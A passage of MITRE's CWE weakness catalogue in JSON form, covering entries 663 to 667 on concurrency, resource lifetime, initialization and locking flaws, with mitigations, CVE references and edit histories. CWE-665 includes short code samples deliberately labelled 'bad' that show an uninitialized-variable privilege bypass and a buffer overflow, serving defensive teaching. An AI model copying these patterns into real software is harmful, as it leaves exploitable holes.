Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Maintenance_Notes, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Synchronization","attr":{"@_Date":"2010-09-27"}}}},"663":{"attr":{"@_ID":"663","@_Name":"Use of a Non-reentrant Function in a Concurrent Context","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software calls a non-reentrant function in a concurrent context in which a competing code sequence (e.g. thread or signal handler) may have an opportunity to call the same function or otherwise influence its state.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"662","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Other"],"Impact":["Modify Memory","Read Memory","Modify Application Data","Read Application Data","Alter Execution Logic"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use reentrant functions if available."},{"Phase":"Implementation","Description":"Add synchronization to your non-reentrant function."},{"Phase":"Implementation","Description":"In Java, use the ReentrantLock Class."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1349","Description":"unsafe calls to library functions from signal handler","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1349"},{"Reference":"CVE-2004-2259","Description":"SIGCHLD signal to FTP server can cause crash under heavy load while executing non-reentrant functions like malloc/free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2259"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"29"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-547","@_Section":"Class ReentrantLock"}},{"attr":{"@_External_Reference_ID":"REF-548"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2008-04-11","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated References, Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, References"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Name, Observed_Examples, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Common_Consequences"}],"Previous_Entry_Name":[{"#text":"Use of a Non-reentrant Function in an Unsynchronized Context","attr":{"@_Date":"2010-09-27"}},{"#text":"Use of a Non-reentrant Function in a Multithreaded Context","attr":{"@_Date":"2010-12-13"}}]}},"664":{"attr":{"@_ID":"664","@_Name":"Improper Control of a Resource Through its Lifetime","@_Abstraction":"Pillar","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not maintain or incorrectly maintains control over a resource throughout its lifetime of creation, use, and release.","Extended_Description":{"xhtml:p":["Resources often have explicit instructions on how to be created, used and destroyed. When software does not follow these instructions, it can lead to unexpected behaviors and potentially exploitable states.","Even without explicit instructions, various principles are expected to be adhered to, such as \\"Do not use an object until after its creation is complete,\\" or \\"do not use an object after it has been slated for destruction.\\""]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Testing","Description":"Use Static analysis tools to check for unreleased resources."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO39-C","Entry_Name":"Do not alternately input and output from a stream without an intervening flush or positioning call","Mapping_Fit":"CWE More Abstract"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"196"}},{"attr":{"@_CAPEC_ID":"21"}},{"attr":{"@_CAPEC_ID":"60"}},{"attr":{"@_CAPEC_ID":"61"}},{"attr":{"@_CAPEC_ID":"62"}}]},"Notes":{"Note":{"#text":"More work is needed on this entry and its children. There are perspective/layering issues; for example, one breakdown is based on lifecycle phase (CWE-404, CWE-665), while other children are independent of lifecycle, such as CWE-400. Others do not specify as many bases or variants, such as CWE-704, which primarily covers numbers at this stage.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Maintenance_Notes, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-07-17","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Applicable_Platforms, Relationships, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Relationships"}],"Previous_Entry_Name":{"#text":"Insufficient Control of a Resource Through its Lifetime","attr":{"@_Date":"2009-05-27"}}}},"665":{"attr":{"@_ID":"665","@_Name":"Improper Initialization","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not initialize or incorrectly initializes a resource, which might leave the resource in an unexpected state when it is accessed or used.","Extended_Description":"This can have security implications when the associated resource is expected to have certain properties or values, such as a variable that determines whether a user has been authenticated or not.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary"},{"Ordinality":"Resultant"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"This weakness can occur in code paths that are not well-tested, such as rare error conditions. This is because the use of uninitialized data would be noticed as a bug during frequently-used functionality."},{"Phase":"Operation"}]},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":["Read Memory","Read Application Data"],"Note":"When reusing a resource such as memory or a program variable, the original contents of that resource may not be cleared before it is sent to an untrusted party."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If security-critical decisions rely on a variable having a \\"0\\" or equivalent value, and the programming language performs this initialization on behalf of the programmer, then a bypass of security may occur."},{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"The uninitialized data may contain values that cause program flow to change in ways that the programmer did not intend. For example, if an uninitialized variable is used as an array index in C, then its previous contents may produce an index that is outside the range of the array, possibly causing a crash or an exit in other environments."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":{"xhtml:p":["This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Initialization problems may be detected with a stress-test by calling the software simultaneously from a large number of threads or processes, and look for evidence of any unexpected behavior. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."]},"Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-12"},"Method":"Manual Dynamic Analysis","Description":"Identify error conditions that are not likely to occur during normal usage and trigger them. For example, run the program under low memory conditions, run with insufficient privileges or permissions, interrupt a transaction before it is completed, or disable connectivity to basic network services such as DNS. Monitor the software for any unexpected behavior. If you trigger an unhandled exception or similar error that was discovered and handled by the application\'s environment, it may still indicate unexpected conditions that were not handled by the application itself."}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-3"},"Phase":"Requirements","Strategy":"Language Selection","Description":{"xhtml:p":["Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, in Java, if the programmer does not explicitly initialize a variable, then the code could produce a compile-time error (if the variable is local) or automatically initialize the variable to the default value for the variable\'s type. In Perl, if explicit initialization is not performed, then a default value of undef is assigned, which is interpreted as 0, false, or an equivalent value depending on the context in which the variable is accessed."]}},{"Phase":"Architecture and Design","Description":"Identify all variables and data stores that receive information from external sources, and apply input validation to make sure that they are only initialized to expected values."},{"Phase":"Implementation","Description":"Explicitly initialize all your variables and other data stores, either during declaration or just before the first usage."},{"Phase":"Implementation","Description":"Pay close attention to complex conditionals that affect initialization, since some conditions might not perform the initialization."},{"Phase":"Implementation","Description":"Avoid race conditions (CWE-362) during initialization routines."},{"Phase":"Build and Compilation","Description":"Run or compile your software with settings that generate warnings about uninitialized variables or data."},{"Phase":"Testing","Description":"Use automated static analysis tools that target this type of weakness. Many modern techniques use data flow analysis to minimize the number of false positives. This is not a perfect solution, since 100% accuracy and coverage are not feasible."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-105"},"Intro_Text":"Here, a boolean initiailized field is consulted to ensure that initialization tasks are only completed once. However, the field is mistakenly set to true during static initialization, so the initialization code is never reached.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"private boolean initialized = true;public void someMethod() {","xhtml:br":"","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"if (!initialized) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"...initialized = true;","xhtml:br":["","","",""],"xhtml:i":"// perform initialization tasks"}}}}}}},{"attr":{"@_Demonstrative_Example_ID":"DX-54"},"Intro_Text":"The following code intends to limit certain operations to the administrator only.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$username = GetCurrentUser();$state = GetStateData($username);if (defined($state)) {}if ($uid == 0) {}","xhtml:br":["","","","",""],"xhtml:div":[{"#text":"$uid = ExtractUserID($state);","attr":{"@_style":"margin-left:10px;"}},{"#text":"DoAdminThings();","attr":{"@_style":"margin-left:10px;"}}],"xhtml:i":"# do stuff"}},"Body_Text":"If the application is unable to extract the state information - say, due to a database timeout - then the $uid variable will not be explicitly set by the programmer. This will cause $uid to be regarded as equivalent to \\"0\\" in the conditional, allowing the original user to perform administrator actions. Even if the attacker cannot directly influence the state data, unexpected errors could cause incorrect privileges to be assigned to a user just by accident."},{"attr":{"@_Demonstrative_Example_ID":"DX-106"},"Intro_Text":"The following code intends to concatenate a string to a variable and print the string.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"char str[20];strcat(str, \\"hello world\\");printf(\\"%s\\", str);","xhtml:br":["",""]}},"Body_Text":["This might seem innocent enough, but str was not initialized, so it contains random memory. As a result, str[0] might not contain the null terminator, so the copy might start at an offset other than 0. The consequences can vary, depending on the underlying memory.","If a null terminator is found before str[8], then some bytes of random garbage will be printed before the \\"hello world\\" string. The memory might contain sensitive information from previous uses, such as a password (which might occur as a result of CWE-14 or CWE-244). In this example, it might not be a big deal, but consider what could happen if large amounts of memory are printed out before the null terminator is found.","If a null terminator isn\'t found before str[8], then a buffer overflow could occur, since strcat will first look for the null terminator, then copy 12 bytes starting with that location. Alternately, a buffer over-read might occur (CWE-126) if a null terminator isn\'t found before the end of the memory segment is reached, leading to a segmentation fault and crash."]}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2001-1471","Description":"chain: an invalid value prevents a library file from being included, skipping initialization of key variables, leading to resultant eval injection.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1471"},{"Reference":"CVE-2008-3637","Description":"Improper error checking in protection mechanism produces an uninitialized variable, allowing security bypass and code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3637"},{"Reference":"CVE-2008-4197","Description":"Use of uninitialized memory may allow code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4197"},{"Reference":"CVE-2008-2934","Description":"Free of an uninitialized pointer leads to crash and possible code execution.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2934"},{"Reference":"CVE-2007-3749","Description":"OS kernel does not reset a port when starting a setuid program, allowing local users to access the port and gain privileges.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3749"},{"Reference":"CVE-2008-0063","Description":"Product does not clear memory contents when generating an error message, leading to information leak.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0063"},{"Reference":"CVE-2008-0062","Description":"Lack of initialization triggers NULL pointer dereference or double-free.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0062"},{"Reference":"CVE-2008-0081","Description":"Uninitialized variable leads to code execution in popular desktop application.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0081"},{"Reference":"CVE-2008-3688","Description":"chain: Uninitialized variable leads to infinite loop.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3688"},{"Reference":"CVE-2008-3475","Description":"chain: Improper initialization leads to memory corruption.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3475"},{"Reference":"CVE-2008-5021","Description":"Composite: race condition allows attacker to modify an object while it is still being initialized, causing software to access uninitialized memory.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5021"},{"Reference":"CVE-2005-1036","Description":"Chain: Bypass of access restrictions due to improper authorization (CWE-862) of a user results from an improperly initialized (CWE-909) I/O permission bitmap","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1036"},{"Reference":"CVE-2008-3597","Description":"chain: game server can access player data structures before initialization has happened leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3597"},{"Reference":"CVE-2009-2692","Description":"chain: uninitialized function pointers can be dereferenced allowing code execution","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2692"},{"Reference":"CVE-2009-0949","Description":"chain: improper initialization of memory can lead to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0949"},{"Reference":"CVE-2009-3620","Description":"chain: some unprivileged ioctls do not verify that a structure has been initialized before invocation, leading to NULL dereference","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3620"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Incorrect initialization"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"ARR02-C","Entry_Name":"Explicitly specify array bounds, even if implicitly defined by an initializer"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"DCL00-J","Entry_Name":"Prevent class initialization cycles"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP4","Entry_Name":"Unchecked Status Condition"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"26"}},{"attr":{"@_CAPEC_ID":"29"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-436"}},{"attr":{"@_External_Reference_ID":"REF-437"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 7, &#34;Variable Initialization&#34;, Page 312"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Likelihood_of_Exploit, Modes_of_Introduction, Name, Observed_Examples, Potential_Mitigations, References, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Detection_Factors, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2013-02-21","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated References, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Observed_Examples"}],"Previous_Entry_Name":{"#text":"Incorrect or Incomplete Initialization","attr":{"@_Date":"2009-01-12"}}}},"666":{"attr":{"@_ID":"666","@_Name":"Operation on Resource in Wrong Phase of Lifetime","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software performs an operation on a resource at the wrong phase of the resource\'s lifecycle, which can lead to unexpected behaviors.","Extended_Description":"When a developer wants to initialize, use or release a resource, it is important to follow the specifications outlined for how to operate on that resource and to ensure that the resource is in the expected state. In this case, the software wants to perform a normally valid operation, initialization, use or release, on a resource when it is in the incorrect phase of its lifetime.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"664","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Follow the resource\'s lifecycle from creation to release."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO46-C","Entry_Name":"Do not access a closed file","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"MEM30-C","Entry_Name":"Do not access freed memory","Mapping_Fit":"CWE More Abstract"}]},"Content_History":{"Submission":{"Submission_Name":"CWE Content Team","Submission_Organization":"MITRE","Submission_Date":"2008-04-11"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships, Time_of_Introduction"}]}},"667":{"attr":{"@_ID":"667","@_Name":"Improper Locking","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not properly acquire or release a lock on a resource, leading to unexpected resource state changes and behaviors.","Extended_Description":{"xhtml:p":"Locking is a type of synchronization behavior that ensures that multiple independently-operating processes or threads do not interfere with each other when accessing the same resource. All processes/threads are expected to follow the same steps for locking. If these steps are not followed precisely - or if no locking is done at all - then another process/thread could modify the shared resource in a way that is not visible or predictable to the original process.  This can lead to data or memory corruption, denial of service, 